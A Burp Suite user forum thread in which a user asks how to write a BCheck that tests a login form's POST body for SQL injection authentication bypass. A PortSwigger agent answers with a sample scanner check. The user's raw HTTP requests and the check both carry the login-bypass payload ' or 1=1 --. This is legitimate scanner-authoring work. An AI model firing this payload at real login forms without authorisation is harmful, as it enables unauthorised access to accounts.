Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

BCheck SQLi bypass autentication

Ventsislav | Last updated: Feb 28, 2024 09:23AM UTC

Hi Hannah, and all Can you answer something for BCheck, how can I check for vulnerabilities in the body of the POST request for example: ``` Content-Length: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/lssems/admin/login.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: close username=vulnerability_check&password=vulnerability_check ``` I know that I can use Intruder, but the question is how can I build BCheck who check exactly this for me? BR

Hannah, PortSwigger Agent | Last updated: Feb 28, 2024 11:57AM UTC

Hi Could you describe a bit more about what checks you would like to implement?

Ventsislav | Last updated: Feb 28, 2024 01:51PM UTC

Bypass user or password SQLi, that's it =) ``` Content-Length: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/lssems/admin/login.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: close username=' or 1=1 --&password=something_dsadsadsa ``` or vice versa ``` Content-Length: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/lssems/admin/login.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: close username=passs&password=' or 1=1 -- ``` BR

Ventsislav | Last updated: Feb 29, 2024 09:09AM UTC

Dear Hannah, here is exactly what I am asking for... ????️❤️ [https://www.youtube.com/watch?v=73PVoVPWW5A] BR to all team ❤️

Ventsislav | Last updated: Feb 29, 2024 10:19AM UTC

Dear, if this is not possible, thank you =) Don't worry I am ok :) BR

Hannah, PortSwigger Agent | Last updated: Feb 29, 2024 11:39AM UTC

It looks like you would want to write an insertion-point level BCheck, that only performs the check on body insertion points. Please note that depending on the insertion point, your payload may be encoded.

You can find an example below:
metadata:
    language: v2-beta
    name: "Insertion-point-level"
    description: "Inserts a payload into body insertion points"
    author: "Carlos Montoya"

define:
    data = "' or 1=1 --"

given body insertion point then
    if {base.response.status_code} is "200" then
        send payload:
            replacing: {data}

        if {latest.response.status_code} is "302" then
            report issue:
                severity: high
                confidence: tentative
                detail: "<ADD_DETAIL_HERE>"
                remediation: "Manual investigation is advised."
        end if
    end if

Ventsislav | Last updated: Feb 29, 2024 01:38PM UTC

Dear Hannah, everything is ok I find a way to do this. Your help was useful! ???? ???? ????

Ventsislav | Last updated: Feb 29, 2024 01:39PM UTC

????????????

Ventsislav | Last updated: Feb 29, 2024 01:39PM UTC

<3

Ventsislav | Last updated: Feb 29, 2024 01:50PM UTC